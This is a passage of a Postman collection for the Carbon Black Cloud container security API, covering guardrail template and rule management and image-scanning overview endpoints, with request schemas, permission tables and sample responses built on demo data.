charset=UTF-8"},{"key":"Content-Length","value":"55"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"92b796bb-b192-4811-9e70-5e82ec222aae"}],"cookie":[],"responseTime":null,"body":"{\n    \"template_id\": \"75f2315e-d6d9-4254-9f19-03001ff6fb02\"\n}"},{"id":"d77c73f0-1ca5-47fe-b775-5b9b0e54056c","name":"Update a Template","originalRequest":{"method":"POST","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"template_id\": \"75f2315e-d6d9-4254-9f19-03001ff6fb02\",\n    \"name\": \"Changing Demo Template One\",\n    \"rules\": [\n        {\n            \"id\": \"demo_rule_one\",\n            \"action\": \"block\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/templates"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 10 May 2023 19:54:27 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"55"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"33508826-c433-4d62-8f22-50bf6e57cbe2"}],"cookie":[],"responseTime":null,"body":"{\n    \"template_id\": \"75f2315e-d6d9-4254-9f19-03001ff6fb02\"\n}"}],"_postman_id":"d530206c-ddf3-4595-9c87-df8ee05441b4"},{"name":"Add Rules to Templates","id":"eeedfdae-eafd-4514-ace3-97bf267b94c8","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"template_ids\": [\n        \"ac6a5ef2-6b7f-4d4e-bc5d-4934f8d28a59\"\n    ],\n    \"rules\": [\n        {\n            \"id\": \"be54f44a-6a18-4365-ada9-aa30c0460ffa\",\n            \"action\": \"alert\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/templates/add_rules","description":"<p>Add the list of provided rules to the list of templates.</p>\n<p>This request returns 204 - No Content when the rules are successfully added to the template.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"template_ids\": [\n    \"&lt;string&gt;\"\n  ],\n  \"rules\": [\n    {\n      \"id\": \"&lt;string&gt;\",\n      \"action\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{cb_org_key}}","guardrails","management","templates","add_rules"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"771dd317-07b2-4735-af98-3a4a56e76990","name":"Add Rules to Templates","originalRequest":{"method":"POST","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"template_ids\": [\n        \"ac6a5ef2-6b7f-4d4e-bc5d-4934f8d28a59\"\n    ],\n    \"rules\": [\n        {\n            \"id\": \"be54f44a-6a18-4365-ada9-aa30c0460ffa\",\n            \"action\": \"alert\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1/orgs/{{cb_org_key}}/guardrails/management/templates/add_rules"},"status":"No Content","code":204,"_postman_previewlanguage":"plain","header":[{"key":"Date","value":"Wed, 10 May 2023 20:21:27 GMT"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"76af6074-4c20-40f6-9262-d2bff5af54cd"}],"cookie":[],"responseTime":null,"body":null}],"_postman_id":"eeedfdae-eafd-4514-ace3-97bf267b94c8"},{"name":"Delete Custom Template","id":"6777a1d6-0e39-4d11-9e6d-3ed4bc35387d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[{"key":"X-AUTH-TOKEN","value":"{{X-AUTH-TOKEN}}"}],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":"{{HOST}}/{{ACCOUNT}}/guardrails/management/templates/{{CUSTOM_TEMPLATE_ID}}","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["{{ACCOUNT}}","guardrails","management","templates","{{CUSTOM_TEMPLATE_ID}}"],"host":["{{HOST}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"6777a1d6-0e39-4d11-9e6d-3ed4bc35387d"}],"id":"37dc8b48-a60d-44e2-a617-c0391c8125fe","_postman_id":"37dc8b48-a60d-44e2-a617-c0391c8125fe","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}}],"id":"877e2946-6634-4d1d-bee4-8ad6cf759570","_postman_id":"877e2946-6634-4d1d-bee4-8ad6cf759570","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Image Scanning - Account Analysis Overview","item":[{"name":"Get clusters, namespaces and repositories","id":"a5f40854-f1c3-44f1-9c01-4f887c75c03d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/overview/metadata","description":"<p>Get lists of clusters, namespaces and repositories.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"clusters\": [\n    \"&lt;string&gt;\"\n  ],\n  \"namespaces\": [\n    \"&lt;string&gt;\"\n  ],\n  \"repositories\": [\n    \"&lt;string&gt;\"\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","inventory","overview","metadata"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"449627f7-b6cb-4bd7-aeb1-41421f082881","name":"Get lists clusters, namespaces and repositories","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/overview/metadata"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 01 May 2023 19:56:39 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"763"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"7c665887-acbd-4dd6-8ba7-327482768deb"}],"cookie":[],"responseTime":null,"body":"{\n    \"clusters\": [\n        \"demo:cluster-one\",\n        \"test:testing-cluster-one\"\n    ],\n    \"namespaces\": [\n        \"demo-namespace\",\n        \"testing-namespace\"\n    ],\n    \"repositories\": [\n        \"demoartifactory/cluster-scanner\",\n        \"demoartifactory/guardrails-enforcer\"\n    ]\n}"}],"_postman_id":"a5f40854-f1c3-44f1-9c01-4f887c75c03d"},{"name":"Scan Status","id":"2b2321d8-bcee-4550-9dcf-5eb29223d687","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"clusters\": [\n        \"demo:cluster-one\",\n        \"test:testing-cluster-one\"\n    ],\n    \"namespaces\": [\n        \"demo-namespace\",\n        \"testing-namespace\"\n    ],\n    \"repositories\": [\n        \"demoartifactory/cluster-scanner\",\n        \"demoartifactory/guardrails-enforcer\"\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/overview/scan_status","description":"<p>Returns the number of deployed images in each possible scan status.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"criteria\": {\n    \"clusters\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespaces\": [\n      \"&lt;string&gt;\"\n    ],\n    \"repositories\": [\n      \"&lt;string&gt;\"\n    ]\n  }\n}\n\n</code></pre>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"SCANNED\": &lt;integer&gt;,\n  \"NOT_SCANNED\": &lt;integer&gt;,\n  \"SCANNING\": &lt;integer&gt;,\n  \"SCAN_FAILED\": &lt;integer&gt;,\n  \"PENDING_SCAN\": &lt;integer&gt;,\n  \"SCAN_ABORTED\": &lt;integer&gt;\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","inventory","overview","scan_status"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"0532ccc1-5a72-4d33-90b4-ad3cd03e4e03","name":"Scan Status","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"clusters\": [\n        \"demo:cluster-one\",\n        \"test:testing-cluster-one\"\n    ],\n    \"namespaces\": [\n        \"demo-namespace\",\n        \"testing-namespace\"\n    ],\n    \"repositories\": [\n        \"demoartifactory/cluster-scanner\",\n        \"demoartifactory/guardrails-enforcer\"\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/overview/scan_status"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 01 May 2023 20:22:44 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"38"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"2ce90212-4558-41f6-a9c0-2fee1928488f"}],"cookie":[],"responseTime":null,"body":"{\n    \"NOT_SCANNED\": 14,\n    \"SCANNED\": 72,\n    \"SCAN_FAILED\": 1\n}"}],"_postman_id":"2b2321d8-bcee-4550-9dcf-5eb29223d687"},{"name":"Fixes Available","id":"1b04bbad-ceca-4b22-a832-255daa55e35a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"clusters\": [\n        \"demo:cluster-one\",\n        \"test:testing-cluster-one\"\n    ],\n    \"namespaces\": [\n        \"demo-namespace\",\n        \"testing-namespace\"\n    ],\n    \"repositories\": [\n        \"demoartifactory/cluster-scanner\",\n        \"demoartifactory/guardrails-enforcer\"\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/overview/fixes","description":"<p>For every severity, how many deployed images have an available fix.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"criteria\": {\n    \"clusters\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespaces\": [\n      \"&lt;string&gt;\"\n    ],\n    \"repositories\": [\n      \"&lt;string&gt;\"\n    ]\n  }\n}\n\n</code></pre>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"CRITICAL\": &lt;integer&gt;,\n  \"HIGH\": &lt;integer&gt;,\n  \"MEDIUM\": &lt;integer&gt;,\n  \"LOW\": &lt;integer&gt;,\n  \"UNKNOWN\": &lt;integer&gt;\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","inventory","overview","fixes"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"54219eb1-c172-4df5-852b-11132aeb0e72","name":"Fixes Available","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"clusters\": [\n        \"demo:cluster-one\",\n        \"test:testing-cluster-one\"\n    ],\n    \"namespaces\": [\n        \"demo-namespace\",\n        \"testing-namespace\"\n    ],\n    \"repositories\": [\n        \"demoartifactory/cluster-scanner\",\n        \"demoartifactory/guardrails-enforcer\"\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/overview/fixes"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 01 May 2023 20:31:43 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"83"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"998caeb6-49e2-483e-a9fe-cb3b2b2104f3"}],"cookie":[],"responseTime":null,"body":"{\n    \"CRITICAL\": 48,\n    \"HIGH\": 53,\n    \"LOW\": 40,\n    \"MEDIUM\": 50,\n    \"UNKNOWN\": 5\n}"}],"_postman_id":"1b04bbad-ceca-4b22-a832-255daa55e35a"},{"name":"New Vulnerabilities - previous 24 hours","id":"adb1354a-1b45-44f5-8fef-2fa4bf06e6ec","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"clusters\": [\n        \"demo:cluster-one\",\n        \"test:testing-cluster-one\"\n    ],\n    \"namespaces\": [\n        \"demo-namespace\",\n        \"testing-namespace\"\n    ],\n    \"repositories\": [\n        \"demoartifactory/cluster-scanner\",\n        \"demoartifactory/guardrails-enforcer\"\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/overview/new_vulnerabilities","description":"<p>Search for new vulnerabilities found in the last 24 hours of the deployed images.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"criteria\": {\n    \"clusters\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespaces\": [\n      \"&lt;string&gt;\"\n    ],\n    \"repositories\": [\n      \"&lt;string&gt;\"\n    ]\n  }\n}\n\n</code></pre>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"CRITICAL\": &lt;integer&gt;,\n  \"HIGH\": &lt;integer&gt;,\n  \"MEDIUM\": &lt;integer&gt;,\n  \"LOW\": &lt;integer&gt;,\n  \"UNKNOWN\": &lt;integer&gt;\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","inventory","overview","new_vulnerabilities"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"dce2b54b-b244-4dcd-8653-3eeb33ac37e5","name":"New Vulnerabilities - previous 24 hours","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"clusters\": [\n        \"demo:cluster-one\",\n        \"test:testing-cluster-one\"\n    ],\n    \"namespaces\": [\n        \"demo-namespace\",\n        \"testing-namespace\"\n    ],\n    \"repositories\": [\n        \"demoartifactory/cluster-scanner\",\n        \"demoartifactory/guardrails-enforcer\"\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/overview/new_vulnerabilities"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 01 May 2023 20:37:23 GMT"},{"key":"Content-Type","value":"application/json; charset=utf-8"},{"key":"Content-Length","value":"58"},{"key":"Connection","value":"keep-alive"},{"key":"Content-Security-Policy","value":"frame-ancestors 'self';"},{"key":"Referrer-Policy","value":"origin"},{"key":"Server","value":"gunicorn"},{"key":"Set-Cookie","value":"SESSION=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/"},{"key":"Set-Cookie","value":"SESSION=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/appservices/"},{"key":"Set-Cookie","value":"SESSION=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/adminServices/"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubDomains; preload"},{"key":"X-Processed-By","value":"psc.auth"}],"cookie":[],"responseTime":null,"body":"{\n    \"CRITICAL\": 10,\n    \"HIGH\": 5,\n    \"LOW\": 4,\n    \"MEDIUM\": 10,\n    \"UNKNOWN\": 2\n}"}],"_postman_id":"adb1354a-1b45-44f5-8fef-2fa4bf06e6ec"},{"name":"Search Vulnerabilities Over Time","id":"cc6c43f3-1763-42a7-b017-9003885b886a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"time\": {\n            \"range\": \"-3d\"\n        },\n        \"clusters\": [\n            \"demo:cluster-one\"\n        ]\n    }\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/overview/vulnerabilities_history","description":"<p>Search for the number of the vulnerabilities found in the deployed images over the specified time range.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container\">API Documentation</a></p>\n<h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"criteria\": {\n        \"time\": {\n            \"range\": \"&lt;string&gt;\",\n            \"start\": \"&lt;string&gt;\",\n            \"end\": \"&lt;string&gt;\"\n        },\n        \"clusters\": [\n            \"&lt;string&gt;\"\n        ]\n    }\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","inventory","overview","vulnerabilities_history"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"c6ae8e34-8920-42fb-9b69-8dd776597c35","name":"Search Vulnerabilities Over Time - Start Date Time","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"time\": {\n            \"start\": \"2023-04-29T00:00:00Z\"\n            \n        },\n        \"clusters\": [\n            \"demo:cluster-one\"\n        ]\n    }\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/overview/vulnerabilities_history"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 May 2023 02:35:17 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"294"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"79611bae-ebe9-45e0-963d-cb41cde77be0"}],"cookie":[],"responseTime":null,"body":"{\n    \"2023-04-29T10:00:07.596Z\": {\n        \"CRITICAL\": 9,\n        \"HIGH\": 37,\n        \"LOW\": 51,\n        \"MEDIUM\": 36,\n        \"UNKNOWN\": 1\n    },\n    \"2023-04-30T10:00:04.419Z\": {\n        \"CRITICAL\": 11,\n        \"HIGH\": 40,\n        \"LOW\": 60,\n        \"MEDIUM\": 56,\n        \"UNKNOWN\": 13\n    },\n    \"2023-05-01T10:00:10.253Z\": {\n        \"CRITICAL\": 13,\n        \"HIGH\": 56,\n        \"LOW\": 77,\n        \"MEDIUM\": 76,\n        \"UNKNOWN\": 32\n    }\n}"},{"id":"5e32966e-bb0b-46ea-ac10-f2a15a7847d8","name":"Search Vulnerabilities Over Time - Range","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"time\": {\n            \"range\": \"-3d\"\n        },\n        \"clusters\": [\n            \"demo:cluster-one\"\n        ]\n    }\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/inventory/overview/vulnerabilities_history"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 May 2023 02:35:17 GMT"},{"key":"Content-Type","value":"application/json; 